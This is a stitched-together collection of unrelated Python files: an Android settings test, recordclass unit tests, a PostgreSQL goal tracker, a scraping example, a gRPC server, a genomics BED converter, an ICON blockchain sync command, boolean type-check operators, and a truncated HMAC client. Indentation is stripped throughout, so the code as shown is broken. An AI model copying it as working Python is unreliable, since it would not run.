import sys
import re
import subprocess
import re
import time
from time import sleep
from datetime import datetime
from cmds import CMDS
class SAMPLE_Test():
def __init__(self, uuid, divide_window=10):
super().__init__()
self.cmd = CMDS(uuid, divide_window)
# self.display_flag = False
# self.end_flag = False
def run_script(self):
# 필수 setup method 반드시 호출
self.cmd.setup_test()
# ########################__비행기 모드 테스트__########################
# self.cmd.cmd_status_airplaneOnOff(exe_type=1, delay=1)
# self.cmd.cmd_status_backButton(iter_count=2)
# sleep(2)
# self.cmd.cmd_status_airplaneOnOff(exe_type=0, delay=1)
# self.cmd.cmd_status_backButton(iter_count=2)
# sleep(2)
# self.cmd.cmd_status_airplaneOnOff(exe_type=0,delay=1)
# self.cmd.cmd_status_backButton(iter_count=2)
#
# self.cmd.cmd_status_autoRotateOnOff(exe_type=1, delay=2)
# sleep(3)
# self.cmd.cmd_status_autoRotateOnOff(exe_type=0, delay=2)
# sleep(3)
# self.cmd.cmd_status_backButton(iter_count=2)
for i in range(3):
# ########################__BlueTooth 모드 테스트__########################
self.cmd.cmd_status_blueToothOnOff(exe_type=1, delay=1)
self.cmd.cmd_status_backButton(iter_count=2)
sleep(2)
self.cmd.cmd_status_blueToothOnOff(exe_type=0, delay=1)
self.cmd.cmd_status_backButton(iter_count=2)
sleep(2)
self.cmd.cmd_status_blueToothOnOff(exe_type=0, delay=1)
self.cmd.cmd_status_backButton(iter_count=2)
# # ########################__화면 회전 모드 테스트__########################
self.cmd.cmd_status_autoRotateOnOff(exe_type=1, delay=2)
sleep(3)
self.cmd.cmd_status_autoRotateOnOff(exe_type=0, delay=2)
sleep(3)
self.cmd.cmd_status_backButton(iter_count=2)
self.cmd.cmd_status_screenShot(delay=2, name='sample_test1')
if __name__ == "__main__":
lm350 = SAMPLE_Test('LMV350N7a33ed5c', divide_window=20)
lm350.run_script()
|
"""Unit tests for recordclass.py."""
import unittest, doctest, operator
from recordclass.typing import RecordClass
import pickle
import typing
import sys as _sys
class CoolEmployee(RecordClass):
name: str
cool: int
class CoolEmployeeWithDefault(RecordClass):
name: str
cool: int = 0
class XMeth(RecordClass):
x: int
def double(self):
return 2 * self.x
class XRepr(RecordClass):
x: int
y: int = 1
def __str__(self):
return f'{self.x} -> {self.y}'
def __add__(self, other):
return 0
class H(RecordClass, hashable=True):
x: int
y: int
class HR(RecordClass, readonly=True):
x: int
y: int
class RecordClassTypingTest(unittest.TestCase):
def test_recordclass_lists(self):
class A(RecordClass):
x:object
y:object
a = A([1,2,3],[3,4,5])
def test_typing(self):
class A(RecordClass):
a: int
b: int
c: object
tmp = A(a=1, b=2, c=[1,2,3])
# self.assertEqual(repr(tmp), "A(a=1, b=2', c=[1, 2, 3])")
# self.assertEqual(tmp.__annotations__, {'a': int, 'b': int, 'c': object})
def test_recordclass_basics(self):
class Emp(RecordClass):
name:str
id:int
joe = Emp('Joe', 42)
jim = Emp(name='Jim', id=1)
self.assertIsInstance(joe, Emp)
self.assertEqual(joe.name, 'Joe')
self.assertEqual(joe.id, 42)
self.assertEqual(jim.name, 'Jim')
self.assertEqual(jim.id, 1)
self.assertEqual(Emp.__name__, 'Emp')
self.assertEqual(Emp.__fields__, ('name', 'id'))
self.assertEqual(Emp.__annotations__,
dict([('name', str), ('id', int)]))
def test_annotation_usage(self):
tim = CoolEmployee('Tim', 9000)
self.assertIsInstance(tim, CoolEmployee)
self.assertEqual(tim.name, 'Tim')
self.assertEqual(tim.cool, 9000)
self.assertEqual(CoolEmployee.__name__, 'CoolEmployee')
self.assertEqual(CoolEmployee.__fields__, ('name', 'cool'))
self.assertEqual(CoolEmployee.__annotations__,
dict(name=str, cool=int))
def test_annotation_usage_with_default(self):
jelle = CoolEmployeeWithDefault('Jelle')
self.assertIsInstance(jelle, CoolEmployeeWithDefault)
self.assertEqual(jelle.name, 'Jelle')
self.assertEqual(jelle.cool, 0)
cooler_employee = CoolEmployeeWithDefault('Sjoerd', 1)
self.assertEqual(cooler_employee.cool, 1)
self.assertEqual(CoolEmployeeWithDefault.__name__, 'CoolEmployeeWithDefault')
self.assertEqual(CoolEmployeeWithDefault.__fields__, ('name', 'cool'))
#self.assertEqual(CoolEmployeeWithDefault._field_types, dict(name=str, cool=int))
with self.assertRaises(TypeError):
exec("""
class NonDefaultAfterDefault(RecordClass):
x: int = 3
y: int
""")
def test_annotation_usage_with_methods(self):
self.assertEqual(XMeth(1).double(), 2)
self.assertEqual(XMeth(42).x, XMeth(42)[0])
self.assertEqual(str(XRepr(42)), '42 -> 1')
self.assertEqual(XRepr(1, 2) + XRepr(3), 0)
with self.assertRaises(TypeError):
exec("""
class XMethBad(RecordClass):
x: int
def __fields__(self):
return 'no chance for this'
""")
def test_recordclass_keyword_usage(self):
class LocalEmployee(RecordClass):
name:str
age:int
nick = LocalEmployee('Nick', 25)
self.assertEqual(nick.name, 'Nick')
self.assertEqual(LocalEmployee.__name__, 'LocalEmployee')
self.assertEqual(LocalEmployee.__fields__, ('name', 'age'))
self.assertEqual(LocalEmployee.__annotations__, dict(name=str, age=int))
#self.assertIs(LocalEmployee._field_types, LocalEmployee.__annotations__)
with self.assertRaises(TypeError):
RecordClass('Name', [('x', int)], y=str)
with self.assertRaises(TypeError):
RecordClass('Name', x=1, y='a')
def test_hash(self):
a = HR(1, 2)
#self.assertEqual(hash(a), hash(tuple(a)))
b = H(1, 2)
hash_b = hash(b)
#self.assertEqual(hash_b, hash(tuple(b)))
b.x = -1
self.assertNotEqual(hash(b), hash_b)
def test_hash_subcls(self):
class B(H): pass
b = B(1,2)
hash(b)
def test_hash_subcls2(self):
class B(H):
def __hash__(self):
return 0
b = B(1,2)
hash(b)
def test_hash_subcls3(self):
class B(HR):
def __hash__(self):
return 0
b = B(1,2)
hash(b)
def test_hash_subcls4(self):
class B(HR):
pass
b = B(1,2)
with self.assertRaises(AttributeError):
b.x = 1
def test_pickle(self):
global Emp
class Emp(RecordClass):
name:str
id:int
jane = Emp('jane', 37)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
z = pickle.dumps(jane, proto)
jane2 = pickle.loads(z)
self.assertEqual(jane2, jane)
def test_pickle2(self):
global Emp2
class Emp2(RecordClass):
name:str
id:int
jane = Emp2('jane', 37)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
z = pickle.dumps(jane, proto)
jane2 = pickle.loads(z)
self.assertEqual(jane2, jane)
def test_pickle3(self):
jane = CoolEmployee('jane', 37)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
z = pickle.dumps(jane, proto)
jane2 = pickle.loads(z)
self.assertEqual(jane2, jane)
def main():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(RecordClassTypingTest))
return suite
|
import psycopg2
from datetime import datetime
from .todo_controller import TodoController
class GoalController:
def __init__(self, connection, list, todo_list):
self.connection = connection
self.list = list
self.tag = "all"
self.controller = TodoController(connection, todo_list)
def show_tags(self):
try:
# query all the items with tag
cursor = self.connection.cursor()
distinct_tag = (f"SELECT DISTINCT tag FROM {self.list}")
cursor.execute(distinct_tag)
result = cursor.fetchall()
return result
except (Exception, psycopg2.Error) as error:
print("Error while connecting to PostgreSQL", error)
return False
def switch_tag(self, tag):
self.tag = tag
def add_repeat_goal(self):
try:
cursor = self.connection.cursor()
title = input("Title: ")
note = input("Note: ")
repeat = int(input("Repeat: "))
tag = input("Tag: ")
ticket_title = input("Ticket title: ")
ticket_note = input("Ticket note: ")
ticket_diff = input("Ticket diff: ")
goal_type = "repeat"
dt = datetime.now()
insert_ticket = (f"INSERT INTO {self.list} (TITLE, NOTE," +
f"TICKETS, COUNTS, COUNTS_DONE, TAG, COMPLETED," +
f"START_DATE, TYPE) VALUES (%s, %s, %s, %s, 0," +
f"%s, FALSE, %s, %s)")
cursor.execute(insert_ticket, [title, note, ticket_title, repeat, tag, dt, goal_type])
self.connection.commit()
for i in range(repeat):
if i == 0:
insert_ticket = (f"INSERT INTO todo (TITLE, NOTE, DIFFICULTY," +
f"TAG, COMPLETED, START_DATE, VISIBLE, GOAL) VALUES (%s, %s, %s," +
f"%s, FALSE, %s, TRUE, %s)")
else:
insert_ticket = (f"INSERT INTO todo (TITLE, NOTE, DIFFICULTY," +
f"TAG, COMPLETED, START_DATE, VISIBLE, GOAL) VALUES (%s, %s, %s," +
f"%s, FALSE, %s, FALSE, %s)")
cursor.execute(insert_ticket, [ticket_title, ticket_note, ticket_diff, tag, dt, title])
self.connection.commit()
return True
except (Exception, psycopg2.Error) as error:
print("Error while connecting to PostgreSQL", error)
return False
def del_ticket(self, id):
try:
cursor = self.connection.cursor()
del_ticket = (f"SELECT TICKETS FROM goal WHERE id = %s;")
cursor.execute(del_ticket, [id])
ticket_name = cursor.fetchall()[0][0]
del_ticket = (f"DELETE FROM todo WHERE title = %s;")
cursor.execute(del_ticket, [ticket_name])
self.connection.commit()
dt = datetime.now()
del_ticket = (f"DELETE FROM {self.list} WHERE id = %s;")
cursor.execute(del_ticket, [id])
self.connection.commit()
return True
except (Exception, psycopg2.Error) as error:
print("Error while connecting to PostgreSQL", error)
return False
def done_ticket(self, id):
try:
cursor = self.connection.cursor()
dt = datetime.now()
done_ticket = (f"UPDATE {self.list} SET completed = TRUE," +
f"end_date = %s WHERE id = %s")
cursor.execute(done_ticket, [dt, id])
self.connection.commit()
return True
except (Exception, psycopg2.Error) as error:
print("Error while connecting to PostgreSQL", error)
return False
def pretty_print_goals(self, results):
if(results):
print("\n Here are your tickets: \n")
repeat = epic = list()
for i in range(len(results)):
if(results[i][7] == "repeat"):
repeat.append(results[i])
elif(results[i][7] == "epic"):
epic.append(results[i])
for goal in repeat:
id = goal[0]
title = goal[1]
notes = goal[2]
count = goal[4]
counts_done = goal[5]
tag = goal[6]
goal_type = goal[7]
print("* Ticket:")
print(" {} | ID: {} | Tag: {} | Goal Type: {}".format(title, id, tag, goal_type))
print(" Notes: \n {}".format(notes))
progress_bar = "["
for i in range(counts_done):
progress_bar += "*"
for i in range(count - counts_done):
progress_bar += "-"
progress_bar += "]"
print(" Progress: \n {}".format(progress_bar))
def show(self):
try:
cursor = self.connection.cursor()
incomplete = (f"SELECT * FROM {self.list} WHERE completed = FALSE")
if self.tag != "all":
incomplete = (f"SELECT * FROM {self.list} WHERE completed = FALSE AND tag = %s")
if self.tag != "all":
cursor.execute(incomplete, [self.tag])
else:
cursor.execute(incomplete)
result = cursor.fetchall()
self.pretty_print_goals(result)
return True
except (Exception, psycopg2.Error) as error:
print("Error while connecting to PostgreSQL", error)
return False |
from urllib.request import urlopen
from bs4 import BeautifulSoup
html = urlopen("http://www.pythonscraping.com/pages/warandpeace.html")
bs0bj = BeautifulSoup(html,"html.parser")
'''
nameList = bs0bj.findAll("span",{"class":"green"})
for name in nameList:
print(name.get_text())
headList = bs0bj.findAll({"h1","h2","h3","h4","h5","h6"})
for head in headList:
print(head.get_text())
nameList = bs0bj.findAll(text="the prince")
print(len(nameList))
print(nameList)
'''
allText = bs0bj.findAll(id="text")
print(allText[0].get_text())
|
from concurrent import futures
import grpc
from .generated import meterusage_pb2_grpc
from .meterusage.service import MeterUsageService
class Server:
@staticmethod
def run():
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
meterusage_pb2_grpc.add_MeterUsageServiceServicer_to_server(
MeterUsageService(), server
)
server.add_insecure_port("[::]:50051")
server.start()
server.wait_for_termination()
if __name__ == "__main__":
Server.run()
|
'''
This script read AJHG table and convert it into a bed file,
listing 20kbp region around the eQTL site.
'''
import sys
from itertools import islice
def main(filename):
fileout = open(filename + "_converted.bed","w")
#print filename
filein = open(filename,"r")
count = 0
for line in islice(filein, 1, None):
elements = line.strip().split("\t")
#print elements
if (float(elements[5])-10000) < 0:
print "FUCK"
break
fileout.write("chr"+elements[4] +"\t" + str(int(elements[5])-10000) +"\t"+ str(int(elements[5])+10000) + "\t"+ elements[0] +"\t0\t"+ elements[6] + "\n")
count +=1
print count
if __name__ == "__main__":
main(sys.argv[1]) |
# import logging
# import os
#
# import pandas as pd
# import pytest
#
# import core.finance as fin
# import helpers.git as git
# import helpers.system_interaction as si
# import helpers.unit_test as hut
# import vendors.cme.reader as cmer
# import vendors.core.base_classes as etl_base
# import vendors.core.config as etl_cfg
# import vendors.csi.reader as csir
# import vendors.etfs.utils as etfut
# import vendors.first_rate.reader as frr # type: ignore
# import im.kibot.utils as kut
# import vendors.pandas_datareader.utils as pdut # type: ignore
#
## #############################################################################
## kibot/utils.py
## #############################################################################
#
#
# class Test_kibot_utils1(hut.TestCase):
# @pytest.mark.slow
# def test_read_data_pq1(self) -> None:
# # TODO(gp): Use unit test cache.
# ext = "pq"
# nrows = 100
# df = kut.read_data("T", "expiry", "ES", ext=ext, nrows=nrows)
# _LOG.debug("df=%s", df.head())
# #
# df2 = kut.read_data(
# "T", "expiry", "ES", ext=ext, nrows=nrows, cache_data=True
# )
# _LOG.debug("df2=%s", df2.head())
# pd.testing.assert_frame_equal(df, df2)
# #
# df3 = kut.read_data(
# "T", "expiry", "ES", ext=ext, nrows=nrows, cache_data=True
# )
# _LOG.debug("df3=%s", df3.head())
# pd.testing.assert_frame_equal(df, df3)
# #
# self.check_string(hut.convert_df_to_string(df, index=True))
#
# @pytest.mark.slow
# def test_read_data_csv1(self) -> None:
# # TODO(gp): Use unit test cache.
# ext = "csv"
# nrows = 100
# df = kut.read_data("T", "expiry", "ES", ext=ext, nrows=nrows)
# _LOG.debug("df=%s", df.head())
# #
# df2 = kut.read_data(
# "T", "expiry", "ES", ext=ext, nrows=nrows, cache_data=True
# )
# _LOG.debug("df2=%s", df2.head())
# pd.testing.assert_frame_equal(df, df2)
# #
# df3 = kut.read_data(
# "T", "expiry", "ES", ext=ext, nrows=nrows, cache_data=True
# )
# _LOG.debug("df3=%s", df3.head())
# pd.testing.assert_frame_equal(df, df3)
# #
# self.check_string(hut.convert_df_to_string(df, index=True))
#
# @pytest.mark.skip(reason="PTask2117")
# def test_read_metadata1(self) -> None:
# df = kut.read_1min_contract_metadata()
# self.check_string(hut.convert_df_to_string(df))
#
# @pytest.mark.skip(reason="PTask2117")
# def test_read_metadata2(self) -> None:
# df = kut.read_daily_contract_metadata()
# self.check_string(hut.convert_df_to_string(df))
#
# def test_read_metadata3(self) -> None:
# df = kut.read_tickbidask_contract_metadata()
# self.check_string(hut.convert_df_to_string(df))
#
# def test_read_metadata4(self) -> None:
# df = kut.read_continuous_contract_metadata()
# self.check_string(hut.convert_df_to_string(df))
#
#
## TODO(gp, Julia): Fix this.
## TODO(gp, Julia): Remove pylint disable after fix.
## pylint: disable=no-member
# @pytest.mark.skip(reason="# TODO(Julia): Enable this once #532 is fixed.")
# class Test_kibot_MonthExpiry1(hut.TestCase):
# """
# Test the logic comparing and processing expiry contracts, e.g., ESH19
# """
#
# def test_less1(self) -> None:
# act = kut._less("U10", "V11")
# self.assertEqual(act, "U10")
#
# def test_less2(self) -> None:
# act = kut._less("U10", "U11")
# self.assertEqual(act, "U10")
#
# def test_less3(self) -> None:
# act = kut._less("V10", "U10")
# self.assertEqual(act, "U10")
#
#
## pylint: enable=no-member
#
#
# class Test_kibot_utils_ExpiryContractMapper1(hut.TestCase):
# """
# Test parsing expiry contracts and sorting them.
# """
#
# def test_parse_expiry_contract_with_year1(self) -> None:
# contract = "SFF19"
# expected_result = ("SF", "F", "19")
# actual_result = kut.ExpiryContractMapper.parse_expiry_contract(contract)
# self.assertTupleEqual(actual_result, expected_result)
#
# def test_parse_expiry_contract_with_year2(self) -> None:
# contract = "SF19"
# expected_result = ("S", "F", "19")
# actual_result = kut.ExpiryContractMapper.parse_expiry_contract(contract)
# self.assertTupleEqual(actual_result, expected_result)
#
# def test_parse_expiry_contract_without_month(self) -> None:
# contract = "S19"
# with self.assertRaises(AssertionError):
# kut.ExpiryContractMapper.parse_expiry_contract(contract)
#
# def test_parse_expiry_contract_without_expiry(self) -> None:
# contract = "S"
# with self.assertRaises(AssertionError):
# kut.ExpiryContractMapper.parse_expiry_contract(contract)
#
# def test_parse_expiry_contract_without_year(self) -> None:
# contract = "SF"
# with self.assertRaises(AssertionError):
# kut.ExpiryContractMapper.parse_expiry_contract(contract)
#
# def test_sort_expiry_contract_year(self) -> None:
# contracts = ["JYF19", "JYF09", "JYF10"]
# expected_result = ["JYF09", "JYF10", "JYF19"]
# actual_result = kut.ExpiryContractMapper.sort_expiry_contract(contracts)
# self.assertListEqual(actual_result, expected_result)
#
# def test_sort_expiry_contract_month(self) -> None:
# contracts = ["JYF19", "JYK19", "JYH19"]
# expected_result = ["JYF19", "JYH19", "JYK19"]
# actual_result = kut.ExpiryContractMapper.sort_expiry_contract(contracts)
# self.assertListEqual(actual_result, expected_result)
#
# def test_sort_expiry_contract_month_year(self) -> None:
# contracts = ["JYF19", "JYH15", "JYK10"]
# expected_result = ["JYK10", "JYH15", "JYF19"]
# actual_result = kut.ExpiryContractMapper.sort_expiry_contract(contracts)
# self.assertListEqual(actual_result, expected_result)
#
#
# class Test_kibot_utils_KibotMetadata(hut.TestCase):
# @pytest.mark.slow()
# def test_get_metadata1(self) -> None:
# kmd = kut.KibotMetadata()
# df = kmd.get_metadata()
# self.check_string(df.to_string())
#
# @pytest.mark.slow()
# def test_get_futures1(self) -> None:
# kmd = kut.KibotMetadata()
# futures = kmd.get_futures()
# self.check_string(" ".join(map(str, futures)))
#
# @pytest.mark.slow()
# def test_get_metadata_tick1(self) -> None:
# kmd = kut.KibotMetadata()
# df = kmd.get_metadata("tick-bid-ask")
# str_df = hut.convert_df_to_string(df)
# self.check_string(str_df)
#
# @pytest.mark.slow()
# def test_get_futures_tick1(self) -> None:
# kmd = kut.KibotMetadata()
# futures = kmd.get_futures("tick-bid-ask")
# self.check_string(" ".join(map(str, futures)))
#
# def test_get_expiry_contract1(self) -> None:
# expiries = kut.KibotMetadata.get_expiry_contracts("ES")
# self.check_string(" ".join(expiries))
#
#
# class Test_kibot_utils_ContractSymbolMapping(hut.TestCase):
# def test_get_contract1(self) -> None:
# csm = kut.ContractSymbolMapping()
# contract = csm.get_contract("CL")
# self.assertEqual(contract, "NYMEX:CL")
#
# def test_get_contract2(self) -> None:
# csm = kut.ContractSymbolMapping()
# contract = csm.get_contract("BZ")
# self.assertEqual(contract, "NYMEX:BZT")
#
# def test_get_kibot_symbol1(self) -> None:
# csm = kut.ContractSymbolMapping()
# symbol = csm.get_kibot_symbol("NYMEX:CL")
# self.assertEqual(symbol, "CL")
#
# def test_get_kibot_symbol2(self) -> None:
# """
# Test for `ICE:T` contract.
#
# `ICE:T` is mapped to multiple symbols, we pick one in the code.
# """
# csm = kut.ContractSymbolMapping()
# symbol = csm.get_kibot_symbol("ICE:T")
# self.assertEqual(symbol, "CRD")
#
# def test_get_kibot_symbol3(self) -> None:
# """
# Test for `CME:ZC` contract.
#
# `CME:ZC` is mapped to multiple symbols.
# """
# csm = kut.ContractSymbolMapping()
# symbols = csm.get_kibot_symbol("CBOT:ZC")
# expected_result = ["COR", "CCM", "CA", "C"]
# self.assertListEqual(sorted(symbols), sorted(expected_result))
#
# def test_get_kibot_symbol4(self) -> None:
# """
# Test for `NYMEX:BZT` contract.
#
# `NYMEX:BZT` is mapped to multiple symbols.
# """
# csm = kut.ContractSymbolMapping()
# symbols = csm.get_kibot_symbol("NYMEX:BZT")
# expected_result = ["B", "Z"]
# self.assertListEqual(sorted(symbols), sorted(expected_result))
#
#
# class TestComputeRet0FromMultiplePrices1(hut.TestCase):
# def test1(self) -> None:
# # Read multiple futures.
# symbols = tuple("CL NG RB BZ".split())
# nrows = 100
# min_price_dict_df = kut.read_data("D", "continuous", symbols, nrows=nrows)
# # Calculate returns.
# mode = "pct_change"
# col_name = "close"
# actual_result = fin.compute_ret_0_from_multiple_prices(
# min_price_dict_df, col_name, mode
# )
# self.check_string(actual_result.to_string())
#
#
## #############################################################################
## pandas_datareader/utils.py
## #############################################################################
#
#
# class Test_pandas_datareader_utils1(hut.TestCase):
# def test_get_multiple_data1(self) -> None:
# ydq = pdut.YahooDailyQuotes()
# tickers = "SPY IVV".split()
# df = ydq.get_multiple_data("Adj Close", tickers)
# #
# self.check_string(hut.get_df_signature(df))
|
# -*- coding: utf-8 -*-
# Copyright 2018 ICON Foundation Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import TYPE_CHECKING, Optional
from .command import Command
from ..libs.state_database_reader import StateDatabaseReader
from ..fastsync.icon_service_syncer import IconServiceSyncer
if TYPE_CHECKING:
from iconservice.base.block import Block
class CommandFastSync(Command):
def __init__(self, sub_parser, common_parser):
self.add_parser(sub_parser, common_parser)
def add_parser(self, sub_parser, common_parser):
name = "fastsync"
desc = "Synchronize ICON Service statedb with compact block db"
mainnet_builtin_score_owner = "hx677133298ed5319607a321a38169031a8867085c"
# create the parser for the 'sync' command
parser = sub_parser.add_parser(name, parents=[common_parser], help=desc)
parser.add_argument(
"-s", "--start", type=int, default=-1, help="start height to sync"
)
parser.add_argument(
"--end", type=int, default=-1, help="end height to sync, inclusive"
)
parser.add_argument(
"-c",
"--count",
type=int,
default=999999999,
help="The number of blocks to sync",
)
parser.add_argument(
"-o",
"--owner",
dest="builtin_score_owner",
default=mainnet_builtin_score_owner,
help="BuiltinScoreOwner",
)
parser.add_argument(
"--stop-on-error",
action="store_true",
help="stop running when commit_state is different from state_root_hash",
)
parser.add_argument("--no-commit", action="store_true", help="Do not commit")
parser.add_argument(
"--write-precommit-data",
action="store_true",
help="Write precommit data to file",
)
parser.add_argument("--no-fee", action="store_true", help="Disable fee")
parser.add_argument("--no-audit", action="store_true", help="Diable audit")
parser.add_argument(
"--deployer-whitelist",
action="store_true",
help="Enable deployer whitelist",
)
parser.add_argument(
"--score-package-validator",
action="store_true",
help="Enable score package validator",
)
parser.add_argument(
"--channel",
type=str,
default="icon_dex",
help="channel name used as a key of commit_state in block data",
)
parser.add_argument(
"--backup-period",
type=int,
default=0,
help="Backup statedb every this period blocks",
)
parser.add_argument(
"--is-config", type=str, default="", help="iconservice_config.json filepath"
)
parser.add_argument(
"--print-block-height",
type=int,
default=1,
help="Print every this block height",
)
parser.add_argument(
"--iiss-db-backup-path",
dest="iiss_db_backup_path",
type=str,
help="Backup all IISS DBs to specified path. "
"If IISS DB is already exists on the path, overwrite it",
)
parser.set_defaults(func=self.run)
def run(self, args):
db_path: str = args.db
start: int = args.start
end: int = args.end
count: int = args.count
stop_on_error: bool = args.stop_on_error
no_commit: bool = args.no_commit
write_precommit_data: bool = args.write_precommit_data
builtin_score_owner: str = args.builtin_score_owner
fee: bool = not args.no_fee
audit: bool = not args.no_audit
deployer_whitelist: bool = args.deployer_whitelist
score_package_validator: bool = args.score_package_validator
channel: str = args.channel
backup_period: int = args.backup_period
iconservice_config_path: str = args.is_config
print_block_height: int = args.print_block_height
iiss_db_backup_path: Optional[str] = args.iiss_db_backup_path
reader = StateDatabaseReader()
# If --start option is not present, set start point to the last block height from statedb
if start < 0:
try:
state_db_path = ".statedb/icon_dex"
reader.open(state_db_path)
block: "Block" = reader.get_last_block()
start = block.height + 1
except:
start = 0
finally:
reader.close()
if end > -1:
if end < start:
raise ValueError(f"end({end} < start({start})")
count: int = end - start + 1
print(
f"loopchain_db_path: {db_path}\n"
f"start: {args.start}, {start}\n"
f"end: {end}\n"
f"count: {count}\n"
f"fee: {fee}\n"
f"audit: {audit}\n"
f"deployerWhitelist: {deployer_whitelist}\n"
f"scorePackageValidator: {score_package_validator}\n"
)
if print_block_height < 1:
raise ValueError(f"print block height should be more than 0")
syncer = IconServiceSyncer()
try:
syncer.open(
config_path=iconservice_config_path,
fee=fee,
audit=audit,
deployer_whitelist=deployer_whitelist,
score_package_validator=score_package_validator,
builtin_score_owner=builtin_score_owner,
)
return syncer.run(
db_path,
channel,
start_height=start,
count=count,
stop_on_error=stop_on_error,
no_commit=no_commit,
write_precommit_data=write_precommit_data,
backup_period=backup_period,
print_block_height=print_block_height,
iiss_db_backup_path=iiss_db_backup_path,
)
finally:
syncer.close()
print("\n")
|
from __future__ import annotations
from typing import final, Final, Tuple, Dict, Optional, List
from Core import Token, TypeSystem
from Operator import Operator
class BoolOp(Operator.Op):
__ARGC: int = 2
def __new__(cls, *args, **kwargs) -> None:
raise NotImplementedError
@classmethod
def argc(cls) -> int:
return cls.__ARGC
@classmethod
def chk_t(cls, rt: Token.Tok, t_env: Dict[int, TypeSystem.T]) -> Optional[Dict[int, TypeSystem.T]]:
t1: TypeSystem.T = rt.chd[0].t
t2: TypeSystem.T = rt.chd[1].t
if t1.base:
if t2.base:
res_t: TypeSystem.T = TypeSystem.T.supt(t1, t2)
if type(res_t) in [TypeSystem.Bool, TypeSystem.Sym]:
rt.t = res_t
else:
return None
else:
res_t: TypeSystem.T = TypeSystem.T.supt(t1, t2.chd_t)
if type(res_t) in [TypeSystem.Bool, TypeSystem.Sym]:
rt.t = TypeSystem.ArrFact.inst().coerce_arr_t(t2, res_t)
else:
return None
else:
if t2.base:
res_t: TypeSystem.T = TypeSystem.T.supt(t1.chd_t, t2)
if type(res_t) in [TypeSystem.Bool, TypeSystem.Sym]:
rt.t = TypeSystem.ArrFact.inst().coerce_arr_t(t1, res_t)
else:
return None
else:
res_t: TypeSystem.T = TypeSystem.T.supt(t1, t2)
if res_t and type(res_t.chd_t) == TypeSystem.Bool:
rt.t = res_t
else:
return None
return t_env
@final
class Neg(BoolOp):
__PRECD: Final[Tuple[int, int]] = (19, 20)
__SYM: Final[str] = '!'
__SGN: Final[List[str]] = ['!Bool -> Bool',
'!Sym -> Sym',
'!List of Bool (n fold) -> List of Bool (n fold)']
__ARGC: Final[int] = 1
def __new__(cls, *args, **kwargs) -> None:
raise NotImplementedError
@classmethod
def precd_in(cls) -> int:
return cls.__PRECD[0]
@classmethod
def precd_out(cls) -> int:
return cls.__PRECD[1]
@classmethod
def sym(cls) -> str:
return cls.__SYM
@classmethod
def sgn(cls) -> List[str]:
return cls.__SGN
@classmethod
def argc(cls) -> int:
return cls.__ARGC
@classmethod
def chk_t(cls, rt: Token.Tok, t_env: Dict[int, TypeSystem.T]) -> Optional[Dict[int, TypeSystem.T]]:
t: TypeSystem.T = rt.chd[0].t
if t.base:
if type(t) not in [TypeSystem.Bool, TypeSystem.Sym]:
return None
else:
rt.t = TypeSystem.Bool.inst()
else:
if type(t.chd_t) != TypeSystem.Bool:
return None
else:
rt.t = TypeSystem.Bool.inst()
return t_env
@final
class And(BoolOp):
__PRECD: Final[Tuple[int, int]] = (6, 5)
__SYM: Final[str] = '&'
__SGN: Final[List[str]] = ['Bool & Bool -> Bool',
'Sym & Sym -> Sym',
'Bool & List of Bool (n fold) -> List of Bool (n fold)',
'List of Bool (n fold) & Bool -> List of Bool (n fold)',
'List of Bool (n fold) & List of Bool (n fold) -> List of Bool (n fold)']
def __new__(cls, *args, **kwargs) -> None:
raise NotImplementedError
@classmethod
def precd_in(cls) -> int:
return cls.__PRECD[0]
@classmethod
def precd_out(cls) -> int:
return cls.__PRECD[1]
@classmethod
def sym(cls) -> str:
return cls.__SYM
@classmethod
def sgn(cls) -> List[str]:
return cls.__SGN
@final
class Or(BoolOp):
__PRECD: Final[Tuple[int, int]] = (4, 3)
__SYM: Final[str] = '|'
__SGN: Final[List[str]] = ['Bool | Bool -> Bool',
'Sym | Sym -> Sym',
'Bool | List of Bool (n fold) -> List of Bool (n fold)',
'List of Bool (n fold) | Bool -> List of Bool (n fold)',
'List of Bool (n fold) | List of Bool (n fold) -> List of Bool (n fold)']
def __new__(cls, *args, **kwargs) -> None:
raise NotImplementedError
@classmethod
def precd_in(cls) -> int:
return cls.__PRECD[0]
@classmethod
def precd_out(cls) -> int:
return cls.__PRECD[1]
@classmethod
def sym(cls) -> str:
return cls.__SYM
@classmethod
def sgn(cls) -> List[str]:
return cls.__SGN
@final
class Xor(BoolOp):
__PRECD: Final[Tuple[int, int]] = (4, 3)
__SYM: Final[str] = '^'
__SGN: Final[List[str]] = ['Bool ^ Bool -> Bool',
'Sym ^ Sym -> Sym',
'Bool ^ List of Bool (n fold) -> List of Bool (n fold)',
'List of Bool (n fold) ^ Bool -> List of Bool (n fold)',
'List of Bool (n fold) ^ List of Bool (n fold) -> List of Bool (n fold)']
def __new__(cls, *args, **kwargs) -> None:
raise NotImplementedError
@classmethod
def precd_in(cls) -> int:
return cls.__PRECD[0]
@classmethod
def precd_out(cls) -> int:
return cls.__PRECD[1]
@classmethod
def sym(cls) -> str:
return cls.__SYM
@classmethod
def sgn(cls) -> List[str]:
return cls.__SGN
|
#!/usr/bin/python
import hashlib
import hmac
import time
import os
import urllib
import urllib2
try:
import simplejson as json
except ImportError:
import json
class Auth:
def __init__(self,apiKey):
self.apiKey = apiKey
return None
def hmac(
self,
url,
httpMethod="GET",
queryParameters=None,
postData=None):
timestamp = str(int(round(time.time()*1000)))
datastring = httpMethod + url
if queryParameters != None :
datastring += queryParameters
datastring += timestamp
if postData != None :
datastring += postData
self.postData = postData
self.token = hmac.new(self.apiKey.decode('hex'), msg=datastring,digestmod=hashlib.sha256).hexdigest()
#return token,timestamp
return self.token,timestamp
#built-in GET request for REST-API
def GET(
self,
url,
username,
httpMethod="GET",
queryParameters=None,
postData=None):
token,timestamp = self.hmac(url,httpMethod,queryParameters,postData)
if queryParameters != None :
url = url + "?" + queryParameters
if postData != None :
req = urllib2.Request(url, postData)
else:
req = urllib2.Request(url)
req.add_header('Content-Type','application/json')
req.add_header('Accept','application/json')
